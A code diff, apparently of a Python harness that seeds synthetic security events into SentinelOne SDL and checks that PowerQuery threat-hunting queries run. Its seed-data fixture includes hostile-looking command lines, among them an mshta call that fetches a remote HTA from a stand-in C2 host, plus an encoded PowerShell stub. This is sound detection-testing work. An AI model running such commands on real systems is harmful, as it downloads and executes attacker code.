    return _post("/api/addEvents", request_body, WRITE_KEY)
|
||||
|
||||
|
||||
def _clean_attrs(rec: dict) -> dict:
|
||||
"""SDL silently rejects events that contain `null` attribute values
|
||||
(the call returns status=success but bytesCharged=0 and the event is
|
||||
not queryable). Strip them, and coerce everything else to JSON-safe
|
||||
primitives that SDL's parser indexes correctly."""
|
||||
out: dict = {}
|
||||
for k, v in rec.items():
|
||||
if v is None:
|
||||
continue
|
||||
if isinstance(v, bool):
|
||||
out[k] = str(v).lower() # SDL stores bools as strings reliably
|
||||
elif isinstance(v, (int, float, str)):
|
||||
out[k] = v
|
||||
else:
|
||||
# dict/list -> JSON string
|
||||
out[k] = json.dumps(v, default=str)
|
||||
return out
|
||||
|
||||
|
||||
def upload_logs(body: str, server_host: str = "kql-proof",
                logfile: str = "kql-proof.jsonl",
                parser: str = "json") -> dict:
    """POST raw text to /api/uploadLogs; SDL applies the named parser.

    The parser, host and logfile travel as HTTP headers. Returns the decoded
    JSON reply, or a synthetic ``{"status": "error", ...}`` dict carrying the
    HTTP status code and the first 500 characters of a non-JSON body.
    """
    request_headers = {
        "Authorization": f"Bearer {WRITE_KEY}",
        "Content-Type": "text/plain",
        "parser": parser,
        "server-host": server_host,
        "logfile": logfile,
    }
    payload = body.encode()
    response = requests.post(f"{BASE}/api/uploadLogs", data=payload,
                             headers=request_headers,
                             timeout=TIMEOUT, verify=VERIFY)
    try:
        decoded = response.json()
    except ValueError:
        decoded = {
            "status": "error",
            "http_status": response.status_code,
            "raw": response.text[:500],
        }
    return decoded
|
||||
|
||||
|
||||
def ingest_jsonl(jsonl_path: Path, run_id: str | None = None,
                 batch_lines: int = 2000) -> tuple[int, str]:
    """Upload a whole JSONL file through ``upload_logs`` in batches.

    Every record is stamped with ``proof_run_id`` (the given *run_id*, or a
    freshly generated one) so later PowerQueries can scope to a single run.
    Blank lines are skipped. A batch is sent as soon as it holds
    *batch_lines* records, and the remainder is sent at the end.

    Returns:
        ``(events_sent, run_id)``.

    Raises:
        RuntimeError: when a batch is not acknowledged with status "success".
    """
    run_id = run_id or f"run-{uuid.uuid4().hex[:10]}"

    def _send(batch: list[str]) -> int:
        # Upload one newline-joined batch; return how many lines it held.
        reply = upload_logs("\n".join(batch))
        if reply.get("status") != "success":
            raise RuntimeError(f"uploadLogs rejected batch: {reply}")
        return len(batch)

    total = 0
    pending: list[str] = []
    for raw in jsonl_path.read_text().splitlines():
        if not raw.strip():
            continue
        record = json.loads(raw)
        record["proof_run_id"] = run_id
        pending.append(json.dumps(record, default=str))
        if len(pending) >= batch_lines:
            total += _send(pending)
            pending = []
    if pending:
        total += _send(pending)
    return total, run_id
|
||||
|
||||
|
||||
# --- powerQuery ------------------------------------------------------------
|
||||
def power_query(query: str,
                start_time: str | int = "7d",
                end_time: str | int | None = None) -> dict:
    """Run *query* through /api/powerQuery and return the decoded response.

    *start_time* and *end_time* are sent as strings; ``endTime`` is omitted
    from the request when *end_time* is None.
    """
    request: dict = {"query": query}
    request["startTime"] = str(start_time)
    if end_time is None:
        return _post("/api/powerQuery", request, READ_KEY)
    request["endTime"] = str(end_time)
    return _post("/api/powerQuery", request, READ_KEY)
|
||||
@@ -0,0 +1,141 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Seed synthetic OCSF-shaped events for docs/runnable_examples/*.pq.
|
||||
|
||||
The 90-day Okta+DNS+Process hunt joins three event families on
|
||||
(userName, host). To make the query return at least one row at
|
||||
startTime="2h", we ingest a small batch of events for two
|
||||
user/host pairs that satisfy all three legs of the join inside
|
||||
the last 2h window.
|
||||
|
||||
Events use SDL dotted-key JSON (the SDL `json` parser indexes
|
||||
nested fields so queries can reference `event.login.userName`,
|
||||
`dns.question.name`, `src.process.cmdline`, etc., as written
|
||||
in the example PQ).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import uuid
|
||||
from datetime import datetime, timedelta, timezone
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import upload_logs, power_query # noqa: E402
|
||||
|
||||
|
||||
NOW = datetime.now(timezone.utc).replace(microsecond=0)
|
||||
|
||||
|
||||
def iso(dt: datetime) -> str:
    """Format *dt* as ``YYYY-MM-DDTHH:MM:SS.000Z``; sub-second digits are always written as 000."""
    seconds_part = format(dt, "%Y-%m-%dT%H:%M:%S")
    return seconds_part + ".000Z"
|
||||
|
||||
|
||||
def in_recent(seconds_ago: int) -> datetime:
    """Return the moment *seconds_ago* seconds before the module-level NOW anchor."""
    offset = timedelta(seconds=seconds_ago)
    return NOW - offset
|
||||
|
||||
|
||||
# (user, host) pairs; build_events emits a full set of events for each pair.
PAIRS = [
    ("alice@contoso.com", "host-alpha"),
    ("bob@contoso.com", "host-bravo"),
]
# Domain names used as dns.question.name in the synthetic DNS events.
BAD_DOMAINS = ["c2.example.com", "suspect.example.net"]
# Command lines used as src.process.cmdline in the synthetic process events.
LOLBINS = [
    "powershell -enc JABm...",
    "rundll32.exe shell32,Control_RunDLL",
    "mshta.exe http://c2.example.com/p.hta",
]
|
||||
|
||||
|
||||
def build_events(run_id: str) -> list[dict]:
    """Build the synthetic OCSF-flavoured events as FLAT dicts with dotted keys.

    Keys contain literal dots (e.g. ``"event.category"``) rather than nested
    objects, so the runnable example can reference ``event.category``,
    ``endpoint.name``, ``dns.question.name``, ``src.process.cmdline`` etc.
    (whether SDL indexes such keys is what harness/probe_dotted_keys.py checks).

    For every (user, host) pair this emits three failed logins, one DNS event
    per bad domain and one process-creation event per LOLBin command line.
    Timestamps start 60 s before NOW and step 30 s further back per event,
    continuing across pairs. ``event.login.loginIsSuccessful`` is written as
    the string ``"false"``, which is what the example query filters on.
    """
    events: list[dict] = []
    age = 60  # seconds before NOW for the next event

    def stamped() -> dict:
        # Fields common to every event; also advances the age for the next one.
        nonlocal age
        when = in_recent(age)
        age += 30
        return {
            "TimeGenerated": iso(when),
            "ts_epoch_ms": int(when.timestamp() * 1000),
            "proof_run_id": run_id,
        }

    for user, host in PAIRS:
        # ---- failed signins (event.category='logins')
        for _ in range(3):
            login = stamped()
            login["event.category"] = "logins"
            login["event.login.userName"] = user
            login["event.login.loginIsSuccessful"] = "false"
            login["endpoint.name"] = host
            events.append(login)
        # ---- bad DNS (event.type='DNS Resolved')
        for domain in BAD_DOMAINS:
            lookup = stamped()
            lookup["event.type"] = "DNS Resolved"
            lookup["dns.question.name"] = domain
            lookup["endpoint.name"] = host
            lookup["src.endpoint.user.name"] = user
            events.append(lookup)
        # ---- suspicious process (event.type='Process Creation')
        for cmdline in LOLBINS:
            proc = stamped()
            proc["event.type"] = "Process Creation"
            proc["endpoint.name"] = host
            proc["src.process.cmdline"] = cmdline
            proc["src.process.user"] = user
            events.append(proc)
    return events
|
||||
|
||||
|
||||
def main() -> int:
    """Seed the runnable-example events into SDL and record the run id.

    Uploads all events in one uploadLogs call, polls every 2 s (at most 30
    times) until they are all counted, then writes the run id to
    sample_data/runnable_examples_run_id.txt. Returns 1 if the upload is
    rejected, otherwise 0 (a polling timeout is not treated as a failure).
    """
    run_id = f"run-runnable-{uuid.uuid4().hex[:10]}"
    events = build_events(run_id)
    lines = [json.dumps(e, default=str) for e in events]
    body = "\n".join(lines)
    print(f"[seed_runnable_examples] events = {len(events)}")
    print(f"[seed_runnable_examples] run_id = {run_id}")
    print(f"[seed_runnable_examples] anchor = {NOW.isoformat()}")

    upload = upload_logs(body, server_host="kql-proof",
                         logfile="runnable-examples.jsonl", parser="json")
    if upload.get("status") != "success":
        print(f"uploadLogs rejected: {upload}")
        return 1

    # Poll until indexed (use proof_run_id which is unique per run).
    print("Waiting for indexing", end="", flush=True)
    count_query = f"proof_run_id='{run_id}' | group n=count()"
    indexed = False
    for _ in range(30):
        time.sleep(2)
        resp = power_query(count_query, "30m")
        table = resp.get("values") or []
        # The count is the single cell of the single row; missing or null -> 0.
        cell = table[0][0] if table and table[0] else None
        n = 0 if cell is None else int(cell)
        print(f" {n}", end="", flush=True)
        if n >= len(events):
            indexed = True
            break
    if indexed:
        print(" ✓ ready")
    else:
        print(" (timeout, continuing)")

    out = ROOT / "sample_data" / "runnable_examples_run_id.txt"
    out.write_text(run_id)
    print(f"Wrote {out}")
    return 0
|
||||
|
||||
|
||||
# Script entry point: main()'s return value becomes the process exit code.
if __name__ == "__main__":
    sys.exit(main())
|
||||
@@ -0,0 +1,26 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Minimal PowerQuery smoke test against SDL."""
|
||||
import sys, json, time
|
||||
from pathlib import Path
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
|
||||
from harness.sdl_client import power_query, power_query_long_running
|
||||
|
||||
# Query window: the last 30 days, expressed in epoch milliseconds.
NOW_MS = int(time.time() * 1000)
START = NOW_MS - 30 * 24 * 3600 * 1000  # 30d back
END = NOW_MS


def _summarize(resp: dict) -> str:
    """Return *resp* as indented JSON with ``values`` replaced by a row count.

    A ``values`` entry that is null is reported as zero rows instead of
    raising on ``len(None)``.
    """
    compact = {
        key: (f"<{len(val or [])} rows>" if key == "values" else val)
        for key, val in resp.items()
    }
    return json.dumps(compact, indent=2, default=str)


q = "dataset='kql-proof' | group n = count() by event_type"
print(f"Query: {q}")
print(f"Window: {START} .. {END}")
t0 = time.time()
r = power_query(q, START, END)
print(f"Initial response in {time.time()-t0:.2f}s:")
print(_summarize(r))
# A token in the initial response triggers the long-running (polling) call.
if r.get("continuationToken") or r.get("token"):
    print("\nPolling for completion ...")
    r = power_query_long_running(q, START, END, max_wait_sec=30)
    print(_summarize(r))
print("\nColumns:", r.get("columns"))
# `or []` also covers a response whose "values" key is present but null.
print("First 20 values:", (r.get("values") or [])[:20])
|
||||
@@ -0,0 +1,30 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Pretty-print the PROOF.json summary as a table."""
|
||||
import json
|
||||
from pathlib import Path
|
||||
|
||||
# Load the proof summary written next to this script's parent directory.
p = Path(__file__).resolve().parents[1] / "reports" / "PROOF.json"
data = json.loads(p.read_text(encoding="utf-8"))
local = data["local"]
# "pq" may be missing or null when no SDL run was recorded.
pq = data.get("pq") or {}

print(f"{'Rule':<46} {'Ref rows':>9} {'SDL rows':>9} {'Status':<10}")
print("-" * 80)
match = diff = err = 0
for rid, entry in local.items():
    p_entry = pq.get(rid) or {}
    if not pq:
        # No SDL results at all: nothing to compare against.
        status, sdl_n = "—", "n/a"
    elif not p_entry.get("ok"):
        status, sdl_n = "ERROR", "?"
        err += 1
    else:
        # A null rowcount is treated as 0 rather than crashing the comparison.
        sdl_n = p_entry.get("rowcount") or 0
        if sdl_n > 0:
            status = "OK"
            match += 1
        else:
            status = "EMPTY"
            diff += 1
    print(f"{rid:<46} {entry['n']:>9} {str(sdl_n):>9} {status:<10}")
print("-" * 80)
if pq:
    print(f"OK: {match} EMPTY: {diff} ERROR: {err}")
print("\nFull report: reports/PROOF.md")
|
||||
@@ -0,0 +1,62 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Try /api/uploadLogs as an alternative to addEvents. We POST each line of
|
||||
the JSONL as a raw event - SDL's json parser will extract fields automatically.
|
||||
|
||||
Per docs: max 6 MB per request, 10 GB/day per tenant, parser=json supports
|
||||
auto-flattening of all keys."""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import uuid
|
||||
from pathlib import Path
|
||||
|
||||
import requests
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))  # lets the later `harness` import resolve
CFG = json.loads((ROOT / "config.json").read_text(encoding="utf-8"))

BASE = CFG["base_url"].rstrip("/")
WRITE = CFG["log_write_key"]

JSONL = ROOT / "sample_data" / "events.jsonl"

# Short random marker stamped on every uploaded record so this upload can be
# found again by the query below.
PROBE = uuid.uuid4().hex[:8]
print(f"probe = {PROBE}")

# Stamp each line with the probe marker
lines = []
for line in JSONL.read_text(encoding="utf-8").splitlines():
    if not line.strip():
        continue
    rec = json.loads(line)
    rec["upload_probe"] = PROBE
    lines.append(json.dumps(rec))
body = "\n".join(lines)
payload = body.encode("utf-8")
print(f"body size = {len(payload)} bytes ({len(lines)} lines)")

headers = {
    "Authorization": f"Bearer {WRITE}",
    "Content-Type": "text/plain",
    "parser": "json",
    "server-host": "kql-proof",
    "logfile": "kql-proof.jsonl",
}
r = requests.post(
    f"{BASE}/api/uploadLogs",
    data=payload,
    headers=headers,
    timeout=120,
    verify=True,
)
print(f"HTTP {r.status_code} -> {r.text[:500]}")
if not r.ok:
    # Nothing was ingested, so waiting and querying for the probe is pointless;
    # exit non-zero so callers can see the upload failed.
    sys.exit(1)

print("\nWaiting 15 s ...")
time.sleep(15)

# Query for the probe value
from harness.sdl_client import power_query  # noqa: E402

q = f"upload_probe='{PROBE}' | group n=count() by event_type"
res = power_query(q, "30m")
print(f"\nQuery result: matching={res.get('matchingEvents')}")
# Columns are handled both as dicts with a "name" key and as plain values.
cols = [c.get("name") if isinstance(c, dict) else c for c in (res.get("columns") or [])]
for row in res.get("values") or []:
    print(f" {dict(zip(cols, row))}")
|
||||
@@ -0,0 +1,92 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Independent post-export verification.
|
||||
|
||||
Reads every file in `pq/` AS WRITTEN ON DISK (no template substitution,
|
||||
no scope prefix, no harness magic) and POSTs it to /api/powerQuery on
|
||||
the configured tenant. The script asserts each file:
|
||||
|
||||
* parses cleanly (no 'error/client/badParam' status),
|
||||
* returns a syntactically valid response (status='success').
|
||||
|
||||
It does NOT assert that the query returns any rows — empty results are
|
||||
fine. The purpose is to catch syntax / field / function errors so the
|
||||
published .pq files are guaranteed runnable by anyone who copies them.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import power_query # noqa: E402
|
||||
|
||||
# Directory of exported query files, and every *.pq file in it in sorted order.
PQ_DIR = ROOT.joinpath("pq")
files = list(PQ_DIR.glob("*.pq"))
files.sort()
|
||||
|
||||
|
||||
def strip_comments(text: str) -> str:
    """Remove whole-line ``//`` comments from *text*.

    A line is dropped when its first non-whitespace characters are ``//``.
    The surviving lines are re-joined with newlines and the result is
    stripped of leading and trailing whitespace. A ``//`` that appears
    after other content on a line is left untouched.
    """
    kept = []
    for line in text.splitlines():
        if line.lstrip().startswith("//"):
            continue
        kept.append(line)
    return "\n".join(kept).strip()
|
||||
|
||||
|
||||
def collapse_whitespace(body: str) -> str:
    """Return *body* on a single line with each whitespace run reduced to one space.

    This mimics pasting the query into a web textbox that strips newlines.
    A correctly formatted PQ must survive the transformation, which means
    every `|` between stages has to be present in the text itself.
    """
    # split() with no separator breaks on runs of whitespace and ignores
    # leading/trailing whitespace, so joining with " " collapses and trims.
    return " ".join(body.split())
|
||||
|
||||
|
||||
# Banner: two header lines followed by one blank line.
print(
    f"Verifying {len(files)} .pq files run cleanly on SDL ...",
    "(Each file tested in TWO forms: as-written and whitespace-collapsed.)",
    "",
    sep="\n",
)

# Result accumulators filled in while the files are checked.
passed: list[str] = []
failed: list[tuple[str, str, str]] = []  # (file, variant, reason)
|
||||
|
||||
|
||||
def run(name: str, variant: str, body: str) -> bool:
    """Run one query variant through ``power_query`` and record the outcome.

    Args:
        name: File name of the query, used in the progress and report lines.
        variant: Label of the tested form (the callers pass "as-written"
            or "collapsed").
        body: Query text sent to ``power_query`` with ``start_time="2h"``.

    Returns:
        True when the response status is ``"success"``, False otherwise.
        Every failure is printed as a progress line and appended to the
        module-level ``failed`` list as ``(name, variant, reason)``.
    """
    t0 = time.time()
    try:
        r = power_query(body, start_time="2h")
    except Exception as e:  # any client/transport error counts as a failed check
        reason = f"exception: {e}"
        # Print the failure immediately, like every other outcome, instead of
        # only surfacing it in the final summary.
        print(f" ✗ {name:<48} [{variant:<9}] {reason}")
        failed.append((name, variant, reason))
        return False
    elapsed = time.time() - t0
    status = r.get("status", "")
    if status == "success":
        matching = r.get("matchingEvents", 0)
        print(f" ✓ {name:<48} [{variant:<9}] "
              f"matching={matching} ({elapsed:.1f}s)")
        return True
    # "message" may be absent, null, or not a string; normalise before slicing
    # so a malformed error response cannot crash the whole verification run.
    msg = str(r.get("message") or "")[:200]
    print(f" ✗ {name:<48} [{variant:<9}] {status} :: {msg}")
    failed.append((name, variant, f"{status}: {msg}"))
    return False
|
||||
|
||||
|
||||
# Check every .pq file in both forms; a file passes only if both succeed.
for pq_file in files:
    query = strip_comments(pq_file.read_text())
    if query:
        # Both variants always run, even when the first one fails, so the
        # report lists every failing form.
        outcomes = [
            run(pq_file.name, "as-written", query),
            run(pq_file.name, "collapsed", collapse_whitespace(query)),
        ]
        if all(outcomes):
            passed.append(pq_file.name)
    else:
        failed.append((pq_file.name, "as-written", "empty after stripping comments"))

print()
print(f"PASS: {len(passed)} FAIL: {len(failed)}")
if failed:
    print("\nFailed queries:")
    for fname, form, reason in failed:
        print(f" {fname} [{form}]: {reason}")
    # Non-zero exit status signals that at least one query failed.
    sys.exit(1)
|
||||
Reference in New Issue
Block a user